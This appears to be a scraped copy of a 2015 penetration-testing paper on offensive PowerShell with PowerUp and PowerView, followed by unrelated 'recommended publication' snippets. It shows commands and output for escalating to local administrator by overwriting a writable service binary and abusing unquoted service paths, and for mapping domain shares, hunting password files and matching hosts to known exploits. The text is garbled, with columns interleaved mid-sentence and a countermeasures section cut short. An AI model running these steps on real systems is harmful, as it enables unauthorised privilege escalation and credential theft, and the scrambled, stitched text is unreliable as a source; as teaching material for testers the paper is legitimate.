Offensive Powershell - Introduction to Powertools

Total Page:16

File Type:pdf, Size:1020Kb

Offensive Powershell - Introduction to Powertools Offensive PowerShell - Introduction to PowerTools Michael Schneider Marc Ruef (Editor) Offense Department, scip AG Research Department, scip AG [email protected] [email protected] https://www.scip.ch https://www.scip.ch Keywords: Active Directory, Backup, Block, Exploit, Framework, GitHub, HTTP, Master, Microsoft, Password 1. Preface [+] Vulnerable service executable: This paper was written in 2015 as part of a research project ProcessExplorerService - C:\Program Files\procexp.exe at scip AG, Switzerland. It was initially published online at [+] Vulnerable service executable: https://www.scip.ch/en/?labs.20150806 and is available in ProcessMonitorService - C:\Program English and German. Providing our clients with innovative Files\Sysinternals\Process research for the information technology of the future is an Monitor\Procmon.exe essential part of our company culture. [*] Checking service permissions... 2. Introduction [*] Checking for unattended install files... PowerShell is a tool with many uses. In earlier Labs [*] Checking %PATH% for potentially articles, I have covered the basics [1] of PowerShell in hijackable .dll locations... context of penetration testing and I’ve tried to block [*] Checking for AlwaysInstallElevated PowerShell [2]. Here, I’ll show you how to use PowerShell registry key... as an offensive tool. To that effect, I have used PowerTools [3] that is part of the Veil-Framework [4] project. [*] Checking for Autologon credentials in registry... 3. PowerUp: Local Attacks [*] Checking for encrypted web.config strings... PowerUp [5] is a tool that supports local privilege escalation attacks against Microsoft Windows systems. It [*] Checking for encrypted application pool was developed by Will Schroeder [6] alias @harmj0y [7]. and virtual directory passwords... PowerUp consists of a PS1-File and is loaded into a PS- There are two possible attack vectors for each service. The Session using the command Import-Module. The function service ProccessExplorerService grants writing rights on Invoke-AllChecks checks the system configuration and lists file procexp.exe to regular local users. Therefore, any other possible attack vectors. Using this function on a Windows 9 file can replace this file. There’s a PowerUp function called client in my test environment, I have found two services Write-ServiceEXE that creates a file that in turn adds a local that I can manipulate using normal user privileges. user to the system who has local administrator privileges. PS C:\Tools\PowerUp> Invoke-AllChecks This file is used to overwrite the service’s file. [*] Running Invoke-AllChecks To retain the ability to reverse this process after successful user creation, the original file should be backed up. Write- [*] Checking if user is in a local group with ServiceEXE automatically creates a backup of the file it administrative privileges... replaces. [*] Checking for unquoted service paths... [*] Use 'Write-UserAddServiceBinary' or Before the attack, an attacker should check if the user 'Write-CMDServiceBinary' to abuse account he uses has sufficient rights to create a copy of a file in the directory. Should this not be the case, the file [+] Unquoted service path: ProcessExplorerService - C:\Program needs to be backed up manually in order to remain as Files\procexp.exe undetected as possible and to reverse the process once the [+] Unquoted service path: file in the directory has been replaced. ProcessMonitorService - C:\Program Files\Sysinternals\Process The subsequent example creates an error message that says Monitor\Procmon.exe procexp.exe has been overwritten but saving the file failed. [*] Checking service executable Regardless of this, when the service starts up again, the permissions... manipulated file is executed and the user scip_admin is [*] Use 'Write-ServiceEXE -ServiceName SVC' created. The result: The attacker has a local administrator or 'Write-ServiceEXECMD' to abuse account at his disposal. PS C:\Tools\PowerUp> Write-ServiceEXE - [+] dc01.labs.scip.ch - Share: IPC$ : ServiceName ProcessExplorerService -UserName Remote IPC scip_admin [+] dc01.labs.scip.ch - Share: NETLOGON Move-Item : Access to the path is denied. : Logon server share At C:\Tools\PowerUp\PowerUp.ps1:689 char:13 [+] dc01.labs.scip.ch - Share: SYSVOL : + Move-Item $ServicePath Logon server share $BackupPath [+] dc01.labs.scip.ch - Share: Users : + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Server: client02.labs.scip.ch + CategoryInfo : [+] IP: 192.168.78.135 PermissionDenied: (C:\Program [+] client02.labs.scip.ch - Logged-on - Files\procexp.exe:FileInfo) [Move-Item], LABS\\sysop UnauthorizedAccessException [+] client02.labs.scip.ch - Logged-on - + FullyQualifiedErrorId : LABS\\sysop MoveFileInfoItemUnauthorizedAccessError,Micro [+] client02.labs.scip.ch - Logged-on - soft.PowerShell.Commands.MoveItemCommand LABS\\sysop [+] client02.labs.scip.ch - Logged-on - [*] Binary for service LABS\\sysop 'ProcessExplorerService' to create user [+] client02.labs.scip.ch - Logged-on - 'scip_admin : Password123!' written to LABS\\jdoe 'C:\Program Files\procexp.exe' [+] client02.labs.scip.ch - Share: ADMIN$ : Remote Admin When they defined the service ProcessMonitorService the [+] client02.labs.scip.ch - Share: C$ : path to the executable was defined without using quotation Default share [+] client02.labs.scip.ch - Share: IPC$ marks. The complete path therefore is C:\Program : Remote IPC Files\Sysinternal\Process Monitor\Procmon.exe. When starting the service, Windows will look for executable files The command Invoke-ShareFinder crawls the network and after every space. Therefore, it doesn’t look for just lists shares by system. Even hidden shares appear in the Procon.exe but also for the following files, in case they list, suffixed with $. These shares are not displayed in exist: Windows Explorer’s default view. Using Invoke- FileFinder, an attacker can search for files in the listed C:\Program.exe shares. Calling the function without any additional C:\Program Files\Sysinternal\Process.exe parameters, it looks for files containing the strings pass, sensitive, secret, admin, login or unattend*.xml in their In order to exploit this misconfiguration, an attacker needs filename. Additional parameters for searching for patterns the right to write to these directories. By default, as well as strings can be added using -Terms. In the unprivileged users do not have writing rights to directories following example, I’ll search for ZIP files. filed under C:\Program Files. In this example, the permissions of sub-directory Sysinternal allow regular PS C:\Tools\PowerView> Invoke-FileFinder users to write files. Using the PowerUp function Write- FullName : UserAddServiceBinary an attacker can create a file that \\dc01.labs.scip.ch\Backup$\passwords.txt creates a new user. This file is copied to directory Owner : BUILTIN\Administrators Sysinternals and will be named Process.exe. When the LastAccessTime : 02.07.2015 07:17:40 service is restarted, a new user named scip_admin2 is LastWriteTime : 02.07.2015 07:18:06 created. The result: The attacker has a local administrator Length : 44 account at his disposal. PS C:\Tools\PowerView> Invoke-FileFinder - Terms *.zip 4. PowerView: A Walk Through the Domain FullName : PowerView, also developed by Will Schroeder, is a tool that \\dc01.labs.scip.ch\Backup$\backup-01.zip uses Windows domain function in order to gather Owner : BUILTIN\Administrators LastAccessTime : 02.07.2015 07:17:13 information about a network and its users. All the tool’s LastWriteTime : 02.07.2015 07:17:13 options are sending legitimate requests that can be executed Length : 0 in the context of the rights of a domain user. Some functions, called MetaFunctions, have their origin in a toll FullName : \\dc01.labs.scip.ch\Backup$\backup-02.zip named netview [8] by Security Researchers Rob Fuller [9] Owner : BUILTIN\Administrators alias mubix [10]. It doesn’t take much to find information LastAccessTime : 02.07.2015 07:17:25 about users, computers and shares. LastWriteTime : 02.07.2015 07:17:13 Length : 0 PS C:\Tools\PowerView> Invoke-Netview Running Netview with delay of 0 FullName : [+] Domain Controller: dc01.labs.scip.ch \\dc01.labs.scip.ch\Backup$\backup-03.zip [*] Total number of hosts: 2 Owner : BUILTIN\Administrators LastAccessTime : 02.07.2015 07:17:32 [+] Server: dc01.labs.scip.ch LastWriteTime : 02.07.2015 07:17:13 [+] IP: 192.168.78.100 Length : 0 [+] dc01.labs.scip.ch - Share: ADMIN$ : Remote Admin Every computer object in the Active Directory has the [+] dc01.labs.scip.ch - Share: Backup$ : version of the operating system including version and [+] dc01.labs.scip.ch - Share: C$ : Service Pack added. The function Get-ExploitableSystems Default share [+] dc01.labs.scip.ch - Share: Data : reads this information and cross-references it with a list of Files\Sysinternals\Process publicly known exploits. Monitor\Procmon.exe 6. Countermeasures PS C:\Tools\PowerView> Get-ExploitableSystems ComputerName : dc01.labs.scip.ch There’s no universal defence against the attacks named in OperatingSystem : Windows Server 2008 R2 this article. The defence against attacks like these begins in Standard the configuration of the operating system and the network. ServicePack : LastLogon : 02.07.2015 07:10:13 When configuring services, make sure that paths MsfModule : exploit/windows/smb/ms10_061_spoolss are always supplied with quotation marks and that CVE : the user of the service has the least possible http://www.cvedetails.com/cve/2010-2729 privileges Avoid having users with administrator rights
Recommended publications
  • Microsoft and Cray to Unveil $25,000 Windows-Based Supercomputer
    AAll About Microsoft: l lCodeTracker A monthly look at Microsoft’s codenames and what they Areveal about the direction of the company. b o u t M i c r o s o f t : All About Microsoft CodeTracker Keeping track of Microsoft's myriad codenames is an (almost) full-time occupation. I know, as I spend a lot of my work hours tracking down the latest names in the hopes of being able to better keep tabs on what's coming next from the Redmondians. Each month, I'll be releasing an updated, downloadable version of the CodeTracker. I'll add new codenames -- arranged in alphabetical order by codename -- of forthcoming Microsoft products and technologies. I also will note timing changes (date slips, the release of a new test build, the disappearance of a planned deliverable) for entries that are already part of the Tracker. Once Microsoft releases the final version of a product or technology I've been tracking, I will remove it from the Tracker. In that way, the CodeTracker will remain focused on futures. (An aside about the Tracker: A question mark in place of an entry means I have insufficient information to hazard even an educated guess about a particular category.) If you have suggested new entries or corrections to existing ones, please drop me an e-mail at mjf at microsofttracker dot com. Thanks! Mary Jo Foley, Editor, ZDNet's "All About Microsoft" blog This Month's Theme: Big iron needs love, too If you went by nothing but blog and publication headlines, you might think mobile phones and slates are where all the innovation is these days.
    [Show full text]
  • Discovery Attender User Guide
    Welcome Sherpa Software's Discovery Attender is a software tool designed to automate the search and collection of electronically stored information across a variety of platforms. This dynamic solution sits behind the firewall and enables in-house talent to identify and gather responsive information in a timely, defensible manner. The Discovery Attender interface is designed to be intuitive and user friendly. The Welcome Screen (above) serves as the gateway to the product. From here you can directly open the PreSearch Tool or create a project. A project serves as a repository for a collection - related searches and associated result sets. Once a new pro- ject is created, the MAIN CONSOLE acts as the central hub to allow you to control the creation, processing, and organization of searches. From here, you can access a Search Wizard which guides you through the step-by- step process of creating a new search. The MAIN CONSOLE also provides access to the Result Management features to view, organize, export and report on the messages, attachments and files that are found during your custom searches. Where to Begin To effectively filter and produce data with Discovery Attender, you must first create a project . Once a project is created, follow the steps below to begin the process: Step Action Description 1 Create and Run A Search A setup wizard leads you through the process of selecting locations and criteria to include in your search. Once started, the chosen data stores are scanned to find items (called results) that match the selected criteria. Information and metadata from these results are stored in the search data- bases.
    [Show full text]
  • Software License Agreement (EULA)
    Third-party Computer Software AutoVu™ ALPR cameras • angular-animate (https://docs.angularjs.org/api/ngAnimate) licensed under the terms of the MIT License (https://github.com/angular/angular.js/blob/master/LICENSE). © 2010-2016 Google, Inc. http://angularjs.org • angular-base64 (https://github.com/ninjatronic/angular-base64) licensed under the terms of the MIT License (https://github.com/ninjatronic/angular-base64/blob/master/LICENSE). © 2010 Nick Galbreath © 2013 Pete Martin • angular-translate (https://github.com/angular-translate/angular-translate) licensed under the terms of the MIT License (https://github.com/angular-translate/angular-translate/blob/master/LICENSE). © 2014 [email protected] • angular-translate-handler-log (https://github.com/angular-translate/bower-angular-translate-handler-log) licensed under the terms of the MIT License (https://github.com/angular-translate/angular-translate/blob/master/LICENSE). © 2014 [email protected] • angular-translate-loader-static-files (https://github.com/angular-translate/bower-angular-translate-loader-static-files) licensed under the terms of the MIT License (https://github.com/angular-translate/angular-translate/blob/master/LICENSE). © 2014 [email protected] • Angular Google Maps (http://angular-ui.github.io/angular-google-maps/#!/) licensed under the terms of the MIT License (https://opensource.org/licenses/MIT). © 2013-2016 angular-google-maps • AngularJS (http://angularjs.org/) licensed under the terms of the MIT License (https://github.com/angular/angular.js/blob/master/LICENSE). © 2010-2016 Google, Inc. http://angularjs.org • AngularUI Bootstrap (http://angular-ui.github.io/bootstrap/) licensed under the terms of the MIT License (https://github.com/angular- ui/bootstrap/blob/master/LICENSE).
    [Show full text]
  • Focus Type Applies To
    Focus Type Applies To All Power Tools All All Power Tools Team Foundation Server All Templates Team Foundation Server All Integration Provider Team Foundation Server All Power Tools Team Foundation Server All Power Tools Team Foundation Server All Integration Provider Team Foundation Server Architecture Power Tools Visual Studio Architecture Power Tools Visual Studio Architecture Templates Visual Studio Architecture Integration Provider Oracle Architecture Templates Expression Builds Power Tools Team Foundation Server Builds Integration Provider Visual Studio Builds Power Tools Team Foundation Server Builds Templates Team Foundation Server Builds Power Tools Team Foundation Server Builds Power Tools Team Foundation Server Builds Power Tools Team Foundation Server Coding Power Tools Visual Studio Coding Integration Provider Visual Studio Coding Azure Integration Visual Studio Coding Integration Provider Dynamics CRM Coding Documentation Visual Studio Coding Integration Provider Visual Studio Coding Templates Visual Studio Coding Documentation Visual Studio Coding Templates SharePoint Coding Templates SharePoint Coding Integration Provider Visual Studio Coding Integration Provider Visual Studio Coding Templates SharePoint Coding Power Tools Visual Studio Coding Power Tools Visual Studio Coding Templates SharePoint Coding Templates Visual Studio Coding Templates Visual Studio Coding Templates Visual Studio Coding Power Tools Visual Studio Coding Integration Provider SharePoint Coding Templates Visual Studio Coding Templates SharePoint Coding
    [Show full text]
  • Introducing Microsoft SQL Server 2014 Technical Overview
    Introducing Windows 8.1 for IT Professionals Introducing Introducing Windows 8.1 for IT Professionals Get a head start evaluating Windows 8.1—with early technical Note insights from award-winning journalist and Windows expert Ed This title is also available as a free Bott. This guide introduces new features and capabilities, providing eBook from Microsoft at: a practical, high-level overview for IT professionals ready to begin http://aka.ms/mspressfree deployment planning now. About the Author Preview new features and enhanced capabilities, Ed Bott is an award-winning journalist including: known to millions of readers through two decades of writing for leading • The Windows 8.1 user experience industry publications and more than 25 • Deployment tools and technologies books on Microsoft Office and Windows, • Security features including Windows 7 Inside Out and • Internet Explorer 11 Microsoft Office Inside Out: 2013 Edition. • Delivering Windows Store apps • Recovery options • Networking and remote access • Virtualization Introducing • Windows RT 8.1 • Managing mobile devices Also see Microsoft SQL Server 2014 Windows 8.1 Administration Microsoft Office Pocket Consultant Inside Out Essentials & Configuration 2013 Edition ISBN: 9780735682658 ISBN: 9780735669062 Storage, Security, & Networking Technical Overview ISBN: 9780735682610 U.S.A. $9.99 Canada $10.99 [Recommended] n Operating Systems/Windows Celebrating 30 years! ROSS MISTRY STACIA MISNER PUBLISHED BY Microsoft Press A Division of Microsoft Corporation One Microsoft Way Redmond, Washington 98052-6399 Copyright © 2014 by Microsoft Corporation All rights reserved. No part of the contents of this book may be reproduced or transmitted in any form or by any means without the written permission of the publisher.
    [Show full text]
  • Snap on Windows an Intel-Sponsored, Open-Source Telemetry Framework IT 447 April 4, 2017
    Snap on Windows An Intel-sponsored, open-source telemetry framework IT 447 April 4, 2017 Phillip Anderson McKade Clements Devin Durtschi Mathew Kuhn Jesse Millar Coach: Dr. Jay Ekstrom Sponsor: Taylor Thomas Table of Contents Table of Contents Executive Summary Introduction Concept Definition Background Stakeholders Intel Companies with Windows Systems Operators of Windows Systems Open-source Maintainers of the Snap Project Members of the Snap Community Stakeholder Requirements Validation Verification System Definition System Requirements Logical Architecture Project Component Details Build Windows Test Environment Perfmon Plugin Sysinternals Plugin Active Directory Plugin Create an Automated Build Script for Snap Critical Path Verification and Validation Project Management Objective Statement List of Deliverables Conclusion References Appendix Source Code Constraint Matrix Governance Framework Communication Acceptance Documentation Gantt Chart Executive Summary Snap for Windows is a Brigham Young University Information Technology 2016-2017 capstone project. Snap is an open-source telemetry system headed by Intel, meant to facilitate the remote monitoring of large networks and company infrastructures. Snap works through three types of “plugins,” which allow for modularized collecting, processing, and publishing of system metrics. These metrics can include data such as cpu usage, number of processes running on a system, and memory available. Previously, Snap’s functionalities were constrained to Linux systems only, and were not compatible with Windows. This prevented a large portion of company infrastructures from utilizing Snap, as companies typically run the Windows operating system on a large portion of their network. The objective for this project included automating Snap’s build process onto Windows through a build script and creating three separate collector plugins based on the Windows’ Perfmon, Active Directory, and Sysinternals applications.
    [Show full text]
  • Automate Windows Environments with Ansible
    Automate Windows Environments with Ansible Orcun Atakan [email protected] Sr. Solution Architect, Red Hat ANSIBLE AUTOMATION FOR WINDOWS What we’ll be discussing today What is Ansible? Windows Management with Ansible What is DSC? Why Use Ansible with DSC? Demo: Rolling update of a .NET application on Windows 2 37,000+ 2800+ 500,000+ Stars on GitHub Ansible modules Downloads a month 3 WHY ANSIBLE? (for Windows) SIMPLE POWERFUL AGENTLESS Human readable automation Enable many use cases Ideal for Windows remoting No special coding skills needed Works hand-in-hand with DSC resources No agents to exploit or update Tasks executed in order Easy platform enablement Standards-based WinRM Usable by every team Leverage Powershell Get productive quickly ANSIBLE AUTOMATION WORKS ACROSS TEAMS BUSINESS DEV/QA COMPUTE NETWORK/SECURITY I.T. OPERATIONS 5 WINDOWS AUTOMATION 100+ 1,300+ Windows Powershell DSC Modules resources ansible.com/windows WHAT CAN I DO USING ANSIBLE FOR WINDOWS Native Windows support uses PowerShell remoting to manage Windows in the same Ansible agentless way ● Install and uninstall MSIs ● Gather facts on Windows hosts ● Enable and disable Windows features ● Start, stop, and manage Windows Services ● Create and Manage local users and groups ● Manage Windows packages via Chocolatey package manager ● Manage and install Windows updates ● Fetch files from remote sites ● Push and execute any Powershell scripts 7 Playbook Example 1/2 - hosts: new_servers tasks: - name: ensure common OS updates are current win_updates: register: update_result
    [Show full text]
  • Meridium V3.6X Open Source Licenses (PDF Format)
    Open Source Components Component Version License License Link Usage Home Page .NET Zip Library Unspecified SharpZipLib GPL License (GPL w/exception) http://www.icsharpcode.net/opensource/sharpziplib/ Dynamic Library http://dotnetziplib.codeplex.com/ 32feet.NET Unspecified Microsoft Public License http://opensource.org/licenses/MS-PL File + Dynamic Library http://32feet.codeplex.com AjaxControlToolkit Unspecified Microsoft Public License http://opensource.org/licenses/MS-PL Dynamic Library http://ajaxcontroltoolkit.codeplex.com/ Android - platform - external - okhttp 4.3_r1 Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0.html File http://developer.android.com/index.html angleproject Unspecified BSD 3-clause "New" or "Revised" License http://opensource.org/licenses/BSD-3-Clause Dynamic Library http://code.google.com/p/angleproject/ Apache Lucene - Lucene.Net 3.0.3-RC2 Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0.html Dynamic Library http://lucenenet.apache.org/ AttributeRouting (ASP.NET Web API) 3.5.6 MIT License http://www.opensource.org/licenses/mit-license.php File http://www.nuget.org/packages/AttributeRouting.WebApi AttributeRouting (Self-hosted Web API) 3.5.6 MIT License http://www.opensource.org/licenses/mit-license.php File http://www.nuget.org/packages/AttributeRouting.WebApi.Hosted AttributeRouting.Core 3.5.6 MIT License http://www.opensource.org/licenses/mit-license.php Component http://www.nuget.org/packages/AttributeRouting.Core AttributeRouting.Core.Http 3.5.6 MIT License http://www.opensource.org/licenses/mit-license.php
    [Show full text]
  • NET Technology Guide for Business Applications // 1
    .NET Technology Guide for Business Applications Professional Cesar de la Torre David Carmona Visit us today at microsoftpressstore.com • Hundreds of titles available – Books, eBooks, and online resources from industry experts • Free U.S. shipping • eBooks in multiple formats – Read on your computer, tablet, mobile device, or e-reader • Print & eBook Best Value Packs • eBook Deal of the Week – Save up to 60% on featured titles • Newsletter and special offers – Be the first to hear about new releases, specials, and more • Register your book – Get additional benefits Hear about it first. Get the latest news from Microsoft Press sent to your inbox. • New and upcoming books • Special offers • Free eBooks • How-to articles Sign up today at MicrosoftPressStore.com/Newsletters Wait, there’s more... Find more great content and resources in the Microsoft Press Guided Tours app. The Microsoft Press Guided Tours app provides insightful tours by Microsoft Press authors of new and evolving Microsoft technologies. • Share text, code, illustrations, videos, and links with peers and friends • Create and manage highlights and notes • View resources and download code samples • Tag resources as favorites or to read later • Watch explanatory videos • Copy complete code listings and scripts Download from Windows Store Free ebooks From technical overviews to drilldowns on special topics, get free ebooks from Microsoft Press at: www.microsoftvirtualacademy.com/ebooks Download your free ebooks in PDF, EPUB, and/or Mobi for Kindle formats. Look for other great resources at Microsoft Virtual Academy, where you can learn new skills and help advance your career with free Microsoft training delivered by experts.
    [Show full text]
  • Windows Tool Reference
    AppendixChapter A1 Windows Tool Reference Windows Management Tools This appendix lists sets of Windows management, maintenance, configuration, and monitor- ing tools that you may not be familiar with. Some are not automatically installed by Windows Setup but instead are hidden away in obscure folders on your Windows Setup DVD or CD- ROM. Others must be downloaded or purchased from Microsoft. They can be a great help in using, updating, and managing Windows. We’ll discuss the following tool kits: ■ Standard Tools—Our pick of handy programs installed by Windows Setup that we think are unappreciated and not well-enough known. ■ Support Tools—A set of useful command-line and GUI programs that can be installed from your Windows Setup DVD or CD-ROM. ■ Value-Added Tools—Several more sets of utilities hidden away on the Windows Setup CD-ROM. ■ Windows Ultimate Extras and PowerToys for XP—Accessories that can be downloaded for free from microsoft.com. The PowerToys include TweakUI, a program that lets you make adjustments to more Windows settings than you knew existed. ■ Resource Kits—A set of books published by Microsoft for some versions of Windows that includes a CD-ROM containing hundreds of utility programs. What you may not have known is that in some cases you can download the Resource Kit program toolkits with- out purchasing the books. ■ Subsystem for UNIX-Based Applications (SUA)—A package of network services and command-line tools that provide a nearly complete UNIX environment. It can be installed only on Windows Vista Ultimate and Enterprise, and Windows Server 2003.
    [Show full text]
  • The Work of Microsoft Research Connections in the Region
    • To tell you more about Microsoft Research Connections • Global • EMEA • PhD Programme • Other engagements • • • Microsoft Research Connections Work broadly with the academic and research community to speed research, improve education, foster innovation and improve lives around the world. Accelerate university Support university research and research through education through collaborative technology partnerships investments Inspire the next Drive awareness generation of of Microsoft researchers and contributions scientists to research Engagement and Collaboration Focus Core Computer Natural User Earth Education and Health and Science Interface Energy Scholarly Wellbeing Environment Communication Research Accelerators Global Partnerships People • • • • • • • • • • • • • • Investment Focus Education & Earth, Energy, Health & Computer Science Scholarly and Environment Wellbeing Communication Programming, Natural User WW Telescope, Academic Search, MS Biology Tools, Mobile Interfaces Climate Change Digital Humanities, Foundation & Tools Earth Sciences Publishing Judith Bishop Kris Tolle Dan Fay Lee Dirks Simon Mercer Regional Outreach/Engagements EMEA: Fabrizio Gagliardi LATAM: Jaime Puente India: Vidya Natampally Asia: Lolan Song America/Aus/NZ: Harold Javid Engineering High-quality and high-impact software release and community adoption Derick Campbell CMIC EMIC ILDC • • . New member of MSR family • • • . Telecoms, Security, Online services and Entertainment Microsoft Confidential Regional Collaborations at Joint Institutes INRIA, FRANCE
    [Show full text]
  • Third Party Version
    Third Party Name Third Party Version Manufacturer License Type Comments Merge Product Merge Product Versions License details Software source autofac 3.5.2 Autofac Contributors MIT Merge Cardio 10.2 SOUP repository https://www.nuget.org/packages/Autofac/3.5 .2 Gibraltar Loupe Agent 2.5.2.815 eSymmetrix Gibraltor EULA Gibraltar Merge Cardio 10.2 SOUP repository https://my.gibraltarsoftware.com/Support/Gi Loupe Agent braltar_2_5_2_815_Download will be used within the Cardio Application to view events and metrics so you can resolve support issues quickly and easily. Modernizr 2.8.3 Modernizr MIT Merge Cadio 6.0 http://modernizr.com/license/ http://modernizr.com/download/ drools 2.1 Red Hat Apache License 2.0 it is a very old Merge PACS 7.0 http://www.apache.org/licenses/LICENSE- http://mvnrepository.com/artifact/drools/dro version of 2.0 ols-spring/2.1 drools. Current version is 6.2 and license type is changed too drools 6.3 Red Hat Apache License 2.0 Merge PACS 7.1 http://www.apache.org/licenses/LICENSE- https://github.com/droolsjbpm/drools/releases/ta 2.0 g/6.3.0.Final HornetQ 2.2.13 v2.2..13 JBOSS Apache License 2.0 part of JBOSS Merge PACS 7.0 http://www.apache.org/licenses/LICENSE- http://mvnrepository.com/artifact/org.hornet 2.0 q/hornetq-core/2.2.13.Final jcalendar 1.0 toedter.com LGPL v2.1 MergePacs Merge PACS 7.0 GNU LESSER GENERAL PUBLIC http://toedter.com/jcalendar/ server uses LICENSE Version 2. v1, and viewer uses v1.3.
    [Show full text]